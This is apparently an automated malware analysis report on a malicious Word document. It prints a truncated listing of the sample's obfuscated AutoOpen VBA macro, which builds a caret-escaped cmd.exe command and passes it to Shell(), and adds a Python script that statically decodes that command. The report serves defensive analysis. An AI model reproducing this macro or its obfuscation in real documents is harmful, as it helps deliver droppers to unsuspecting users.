Verdict: MALICIOUS
Risk Score: 242
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample is a malicious Office document containing a VBA macro. Its Autoopen subroutine calls a helper function that ends in a Shell() invocation, which is highly indicative of downloader or dropper functionality. The macro is padded with junk arithmetic loops under On Error Resume Next, and the string fragments it concatenates form a caret-obfuscated cmd.exe command line (%^c^o^m^S^p^E^c^% with /V delayed expansion and a chain of set commands), consistent with a design that assembles and executes a second-stage command at runtime. The visible source does not by itself show a payload URL; the only URL extracted from the document is the OOXML DrawingML schema namespace.
Heuristics (7)
- ClamAV [critical] (CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6578629-0
- VBA macros detected [medium, 3 related findings] (OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA [critical] (OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro [high] (OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. (For this sample the VBA source was in fact recovered, see Extracted artifacts, so this marker adds no independent evidence.)
- Embedded URL [info] (EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard OOXML DrawingML namespace URI, not a payload location.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 18076 bytes | 52db9b90e6da99066eeaf358fcefd3a9b9c1be4077cfc3f5fed9a4e0b47e6584 |
Preview: first 1,000 lines of the extracted script (the listing is cut off at "... (truncated)")

```vba
Attribute VB_Name = "DbTAiYloZzmu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function ahbFTYD()
On Error Resume Next
For OfTswp = opKsRw To 30475
FtBZI = (nUjms - ChrW(14360 * 33928) * YiIMf * CInt(TChCP + Sqr(74898)) + 83975 - 21322 / 87641 - CDate(iFPoVl - 59426 + 86375 - Hex(oaKmFE / 65412)) + (jRcjE * Tan(JlDMz)))
Next
For VNcbF = mrdmm To 6580
brfIP = (zhbKtQ - ChrW(83984 * 57294) * FCRZfi * CInt(azjhB + Sqr(34748)) + 81069 - 65832 / 89476 - CDate(ZTdZid - 76159 + 70904 - Hex(cuCjK / 26641)) + (zmbUNY * Tan(LQhYia)))
Next
ahbFTYD = HalhShlkRbR + Shell(pMEhBRbK + Chr(qdiEFPZI + vbKeyC + iiOGmPsm) + hzAivtXzN + jzcwnhuAWr + lzHrhH + KsCUYtnW + lrdbbXw + lOJuuwmYWFj + tuGuLUkZ, PluSm + 0 + IbNdtEBw)
For rtQOrY = PbZio To 56253
VYOZT = (UEHaSB - ChrW(73351 * 35006) * wEFKW * CInt(BmUSpa + Sqr(65612)) + 20563 - 3784 / 81002 - CDate(ubpsS - 97729 + 29064 - Hex(Lnlqwq / 73479)) + (GiUZdG * Tan(UmuHd)))
Next
End Function
Sub Autoopen()
On Error Resume Next
For mtFjt = KcQiG To 80719
LwPwY = (DsbjhQ - ChrW(89882 * 77052) * VFYrl * CInt(YtjGCk + Sqr(52627)) + 11117 - 80549 / 220 - CDate(jSvVE - 80782 + 41681 - Hex(aIKNXT / 97753)) + (DGKFO * Tan(NmFiq)))
Next
ahbFTYD
For rbmlj = hcslR To 30468
LKqNj = (nDSXz - ChrW(59577 * 89381) * iFJQVz * CInt(owWZj + Sqr(7523)) + 72234 - 42891 / 49136 - CDate(pvCCu - 44276 + 47592 - Hex(ZCRYE / 75158)) + (lUCXj * Tan(vPCWL)))
Next
End Sub
Attribute VB_Name = "ozFBhtFKjr"
Function hzAivtXzN()
On Error Resume Next
For JpQNAs = RTJBj To 401
diwHL = (nzaAKE - ChrW(21509 * 66084) * wRXvN * CInt(Rkkbb + Sqr(19304)) + 46571 - 4732 / 35718 - CDate(ikWjC - 27178 + 71431 - Hex(lpJPP / 6094)) + (joQWsi * Tan(moMwOf)))
Next
qMskQX = "md WtdSC" + "ibhsch TstcAoCJ" + "wNFwEShPQi o" + "fiwf" + "Aq"
For pPzHzj = owwij To 10837
YCBUh = (uVHfaY - ChrW(86340 * 96193) * XEzFjv * CInt(MHSWb + Sqr(84935)) + 80889 - 33536 / 77778 - CDate(YaOmK - 56251 + 63690 - Hex(qTHRhZ / 75879)) + (Hbuib * Tan(OwpuC)))
Next
pLUBbJ = "jcHC & " + " %^c^o^m^" + "S^p^E^c^%" + " " + " %" + "^c^" + "o^m^S^p^E^c" + "^% /V " + " " + " /c s"
For ECfqr = zSjuM To 51911
FqcRv = (sjFlPW - ChrW(10731 * 70171) * LPzQa * CInt(unoRa + Sqr(34842)) + 50045 - 40318 / 73945 - CDate(OTQVh - 74129 + 63661 - Hex(TKbzRQ / 37821)) + (izGTzw * Tan(vLDoA)))
Next
iJGpTjjYXcC = "et %NLzHM" + "JoWj" + "FiCZj" + "Y%=wLtRcu" + "HTn"
For ISOTY = CpPSZ To 66666
zQvvW = (zpnaO - ChrW(35969 * 27994) * TUKiw * CInt(ZKrMjs + Sqr(29713)) + 32207 - 92693 / 29519 - CDate(hluzkA - 31024 + 62796 - Hex(CfVrA / 748)) + (jjUEn * Tan(BdmYiO)))
Next
oCwNWuwd = "J&&set %h" + "uHojGaa" + "AJGAPS" + "%=p&&set %om" + "AzmVbC" + "aQJXvN%" + "=o" + "^w&&s" + "et %wzA"
For IhsYuj = TSjTuz To 65757
upzMfi = (hbKsHj - ChrW(34021 * 23698) * RBCHV * CInt(wzUSqQ + Sqr(1143)) + 2140 - 20690 / 80473 - CDate(WizZWi - 91748 + 54251 - Hex(RNBYw / 4033)) + (XBsva * Tan(HsBsN)))
Next
HpNuSNql = "wV" + "hSuzuzwGYb%=wU" + "KdIQ" + "GfrViqaT&&set " + "%QCbZHpB" + "B%=" + "!%huHojGa" + "aAJGAPS%!" + "&&set %Ed"
For PjazDO = jOmvS To 13417
VUiwvU = (KczSuS - ChrW(25308 * 51285) * XdVDM * CInt(rOzJl + Sqr(36643)) + 83282 - 72441 / 11724 - CDate(ouonJF - 94423 + 85779 - Hex(EDahI / 93823)) + (IKORwD * Tan(BdUwl)))
Next
BBtJDsAXQRj = "UCNqWkjzk" + "fjdV" + "%=EVpiwmJ&&" + "set" + " %fHhbhMOZj" + "wKvTN%=e^r" + "&&set %"
hzAivtXzN = qMskQX + pLUBbJ + iJGpTjjYXcC + oCwNWuwd + HpNuSNql + BBtJDsAXQRj
End Function
Function jzcwnhuAWr()
On Error Resume Next
For VTrtrG = YnuSj To 55810
IPQjp = (mKhWo - ChrW(56151 * 71632) * nJpGLJ * CInt(lMhpCZ + Sqr(51781)) + 40136 - 29111 / 93608 - CDate(TCKlMo - 17893 + 46188 - Hex(KmUEOU / 92119)) + (dFLUTS * Tan(Diqno)))
Next
iFOMGhq = "BqG" + "VBqOzbUhB%=!%o" + "mAzmVb" +
... (truncated)
```
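To see what the Shell() call actually receives, the following Python script (an added example written for this report, not analyzer output or code from the sample) statically folds the string-concatenation lines of hzAivtXzN copied from the preview above, resolves the Chr(qdiEFPZI + vbKeyC + iiOGmPsm) term using VBA semantics (vbKeyC is 67, and Variants that are never assigned are Empty, which concatenates as an empty string), and then applies the two cmd.exe layers visible in the result: caret removal and the set NAME=VALUE / !NAME! delayed-expansion chain that /V enables. The function jzcwnhuAWr is cut off on this page, so it is represented by a placeholder; its real value has to be taken from the extracted macros.bas artifact. The TRUNCATED set, the VB_CONSTANTS table and the placeholder format are this example's own assumptions.

```python
"""Static recovery of the command string this macro hands to Shell()."""
import re

# Copied from the preview above: the string-assembling function and the Shell() call.
# The junk arithmetic loops between the assignments are omitted; they never touch the strings.
VBA_EXCERPT = r'''
Function hzAivtXzN()
On Error Resume Next
qMskQX = "md WtdSC" + "ibhsch TstcAoCJ" + "wNFwEShPQi o" + "fiwf" + "Aq"
pLUBbJ = "jcHC & " + " %^c^o^m^" + "S^p^E^c^%" + " " + " %" + "^c^" + "o^m^S^p^E^c" + "^% /V " + " " + " /c s"
iJGpTjjYXcC = "et %NLzHM" + "JoWj" + "FiCZj" + "Y%=wLtRcu" + "HTn"
oCwNWuwd = "J&&set %h" + "uHojGaa" + "AJGAPS" + "%=p&&set %om" + "AzmVbC" + "aQJXvN%" + "=o" + "^w&&s" + "et %wzA"
HpNuSNql = "wV" + "hSuzuzwGYb%=wU" + "KdIQ" + "GfrViqaT&&set " + "%QCbZHpB" + "B%=" + "!%huHojGa" + "aAJGAPS%!" + "&&set %Ed"
BBtJDsAXQRj = "UCNqWkjzk" + "fjdV" + "%=EVpiwmJ&&" + "set" + " %fHhbhMOZj" + "wKvTN%=e^r" + "&&set %"
hzAivtXzN = qMskQX + pLUBbJ + iJGpTjjYXcC + oCwNWuwd + HpNuSNql + BBtJDsAXQRj
End Function
ahbFTYD = HalhShlkRbR + Shell(pMEhBRbK + Chr(qdiEFPZI + vbKeyC + iiOGmPsm) + hzAivtXzN + jzcwnhuAWr + lzHrhH + KsCUYtnW + lrdbbXw + lOJuuwmYWFj + tuGuLUkZ, PluSm + 0 + IbNdtEBw)
'''

# Assumption: functions the preview shows but cuts off ("... (truncated)"); not recoverable here.
TRUNCATED = {"jzcwnhuAWr"}
# VBA keycode constant used inside Chr(); every other operand is an unassigned Variant (Empty -> 0).
VB_CONSTANTS = {"vbKeyC": 67}

LITERAL_LINE = re.compile(r'^\s*(\w+)\s*=\s*((?:"[^"]*"\s*(?:\+\s*)?)+)$', re.M)
CONCAT_LINE = re.compile(r'^\s*(\w+)\s*=\s*(\w+(?:\s*\+\s*\w+)+)\s*$', re.M)


def build_env(src):
    """Fold every 'x = "a" + "b"' line, then every 'y = x1 + x2' line whose operands are known."""
    env = {}
    for name, rhs in LITERAL_LINE.findall(src):
        env[name] = "".join(re.findall(r'"([^"]*)"', rhs))
    for name, rhs in CONCAT_LINE.findall(src):
        terms = [t.strip() for t in rhs.split("+")]
        if all(t in env for t in terms):
            env[name] = "".join(env[t] for t in terms)
    return env


def split_plus(expr):
    """Split a VBA expression on '+' at parenthesis depth 0."""
    parts, depth, cur = [], 0, ""
    for ch in expr:
        depth += (ch == "(") - (ch == ")")
        if ch == "+" and depth == 0:
            parts.append(cur.strip())
            cur = ""
        else:
            cur += ch
    parts.append(cur.strip())
    return parts


def resolve(term, env, unresolved):
    """Static value of one '+' operand: known literal, Chr(constants), truncated function, or Empty."""
    if term in env:
        return env[term]
    m = re.fullmatch(r"Chr\((.*)\)", term)
    if m:  # Chr(a + vbKeyC + b) with a, b never assigned -> Chr(67) -> "C"
        return chr(sum(VB_CONSTANTS.get(t, 0) for t in split_plus(m.group(1))))
    if term in TRUNCATED:
        unresolved.append(term)
        return "<" + term + ">"  # placeholder for the part cut off on the page
    return ""  # never assigned anywhere: Empty concatenates as ""


def recover_shell_argument(src=VBA_EXCERPT):
    """Return (Shell() command string as far as visible, names whose bodies were truncated)."""
    env = build_env(src)
    arg = re.search(r"Shell\((.*?),\s*[\w\s+]+\)", src).group(1)
    unresolved = []
    value = "".join(resolve(t, env, unresolved) for t in split_plus(arg))
    return value, unresolved


def cmd_unescape(s):
    """cmd.exe drops '^' and takes the next character literally; here it only breaks up keywords."""
    return s.replace("^", "")


def cmd_set_assignments(cmdline):
    """Collect 'set NAME=VALUE' pairs and resolve !NAME! delayed-expansion references (cmd /V)."""
    assigned = {}
    for name, value in re.findall(r"set ([^=&]+)=([^&]*)", cmdline):
        assigned[name] = re.sub(r"!([^!]+)!", lambda m: assigned.get(m.group(1), m.group(0)), value)
    return assigned


if __name__ == "__main__":
    cmd, missing = recover_shell_argument()
    print("Shell() argument (visible part):", cmd)
    print("truncated on this page:", missing)
    for name, value in cmd_set_assignments(cmd_unescape(cmd)).items():
        print("  %-25s = %s" % (name, value))
```

Run stand-alone, it prints a command line that begins with Cmd, some junk tokens, then `%comSpEc%  %comSpEc% /V   /c set ...` once the carets are stripped, i.e. the macro invokes cmd.exe (COMSPEC) with delayed expansion and a chain of environment-variable assignments. The values recovered from the visible fragments are p, ow, er, a longer junk string, and a !var! copy of p, which is the usual way of spelling out a program name that only exists at runtime; the remainder lives in the truncated functions. The omitted For loops call ChrW() with out-of-range arguments and would raise errors, which On Error Resume Next swallows, so dropping them from the excerpt does not change the result.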